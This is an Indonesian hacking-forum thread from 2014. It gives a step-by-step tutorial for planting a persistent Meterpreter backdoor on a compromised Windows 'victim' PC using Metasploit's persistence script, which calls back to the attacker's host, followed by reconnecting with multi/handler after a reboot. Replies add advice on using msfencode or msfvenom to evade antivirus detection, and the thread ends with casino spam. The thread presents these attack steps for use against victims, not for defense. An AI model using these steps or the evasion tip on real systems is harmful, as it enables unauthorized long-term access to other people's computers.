maintaining access dengan persistence metasploit service

**tirtana** · 04-15-2014, 11:49 PM

PERSISTENt METERPRETER SERVICE Smile

Hai hai khalayak ramai , q mo share salah satu teknik mantaining access di windows,
untuk kesempetan kali ini kita menggunakan persistence yang sudh ada di metasploit...
teknik kini di eksekusi setelah kita mendapat meterpreter dari si korban

chek it dooot

setelah kita mendapatkan meterpreter
[Image: 1gmwpg.jpg]

kita migrate dulu untuk memudahkan pekerjaan hahahaha
[Image: 2dhv31y.jpg]

nach ini dia akhirnya sampai di puncak acara
maintaining access dengan persistence metepreter service
ketik run persistence -h untuk melihat commandya
[Image: 2mxk2lf.jpg]

mari kita buat backdooornya........
ketik run persistence run persistence -U -i 5 -p 443 -r 192.168.1.2 ---- > LHOST mu
[Image: t5hgg5.jpg]

aand backdoor the persistence meterpreter service created
skrg coba reboot PC si korban
[Image: 143lxmu.jpg]

setelah itu accecs kembali si korban dengan exploit multi handler
set Lhost sesuai yang tadi loe input di persistence
set LPORT sesuai juga yang di input di persistence ya …. lalu explooit
[Image: 1gmwpg.jpg]

TAAARAAAAAAA meterpreter pun terbentuk kembali.........
and GAME OVER
[Image: 1gmwpg.jpg]

demikian tuturial dari seorang newbi yang lebay,, yang ingin belajar belajar dan belajar...
jika ini repost bisa di hapus om admin.
Jika ada kekurangan mohon di benarkan..

nb: tapi sayang teknik ini ketika di eksekusi masih terdeteksi sebagiai virus/trojan
detected oleh AVAST Sad

(
intinya, ilmu tidak akan berkurang bila kita sharingkan,

zee eichel · 04-16-2014, 12:00 AM

Terima kasih karena udah mau share.. walau salah kamar nih .. tapi itu karena mas belum di aktivasi. Saya sudah aktivasi sekalian akun mas ... nice share .. btw untuk menghindari jebakan antivirus .. bisa menggunakan encoding dgn msfencode maupun msfvenom berbagai tutorial mengenai hal tersebut sdh di bahas di forum ini.. terima kasih

**tirtana** · 04-16-2014, 10:50 AM

thank you untuk sarannya mas,
tapi backddor ini terdetect sebagai virus ketika kita mnjalankan

run persistence -U -i 5 -p 443 -r 192.168.1.2

secara otomatis di PC korban akan ada peringatan.disini lah yang masih bingung saya, ( metsvc -A )juga terdeteksi sbgi virus.

**wine trochanter** · 04-16-2014, 11:05 AM

kereennn dah
ijin belajar ini yahh Big Grin

@tirtana ask dong
yg setelah di reboot pc korban
setelah itu accecs kembali si korban dengan exploit multi handler
set Lhost sesuai yang tadi loe input di persistence
set LPORT sesuai juga yang di input di persistence ya …. lalu explooit
jadi gini bukan lhost nya ip kita
terus lport nya 4444 ato 443 sesuai gmbar ente?

**tirtana** · 04-16-2014, 11:24 AM

(04-16-2014, 11:05 AM)wine trochanter Wrote: kereennn dah
ijin belajar ini yahh

@tirtana ask dong
yg setelah di reboot pc korban
setelah itu accecs kembali si korban dengan exploit multi handler
set Lhost sesuai yang tadi loe input di persistence
set LPORT sesuai juga yang di input di persistence ya …. lalu explooit
jadi gini bukan lhost nya ip kita
terus lport nya 4444 ato 443 sesuai gmbar ente?

waaadduhhhh,,,, salah masukin input url gmbar om,,, iya ke LPORT 443, sesuai yang di persistence, q malah g merhatiin hihihi,, thank u sarannya mas,, sangat membangun

**cyberly** · 04-16-2014, 11:39 AM

nice thread bro, walau saye tak begitu paham dengan metasploit, tapi saye menyukai tutornya, thanks bro keep share :-bd

**wine trochanter** · 04-16-2014, 11:53 AM

(04-16-2014, 11:24 AM)tirtana Wrote:
(04-16-2014, 11:05 AM)wine trochanter Wrote: kereennn dah
ijin belajar ini yahh

@tirtana ask dong
yg setelah di reboot pc korban
setelah itu accecs kembali si korban dengan exploit multi handler
set Lhost sesuai yang tadi loe input di persistence
set LPORT sesuai juga yang di input di persistence ya …. lalu explooit
jadi gini bukan lhost nya ip kita
terus lport nya 4444 ato 443 sesuai gmbar ente?

waaadduhhhh,,,, salah masukin input url gmbar om,,, iya ke LPORT 443, sesuai yang di persistence, q malah g merhatiin hihihi,, thank u sarannya mas,, sangat membangun

ahahha sama2 om, saling mengingatkan biar bisa bljr bareng2 \m/\m/

**abdilahrf** · 10-08-2014, 04:45 PM

walaupun udah di reboot tinggal masuk persistence langsung open lagi sessionnya ya , mantep om ane blm pernah coba sih :v

sungsel · 10-20-2014, 08:51 PM

waduh..kereen brooww...ane kapan-kapan mau coba ah praktek...

10-21-2014, 01:36 PM

Wah, bagus euy beritanya. . .
Gue suka nih infonya. . .
Sambil baca, gue ikut promosi ya?
Tapi jangan dihapus apalagi di Banned ya.
Gue kan cari rejeki.

Buat Kamu yang suka main Poker dan Game Online.
Nih gabung di MILD CASINO.
Tempat paling cocok buat penggemar Poker dan Game Online.
MILDCASINO
Sekarang juga ya !!!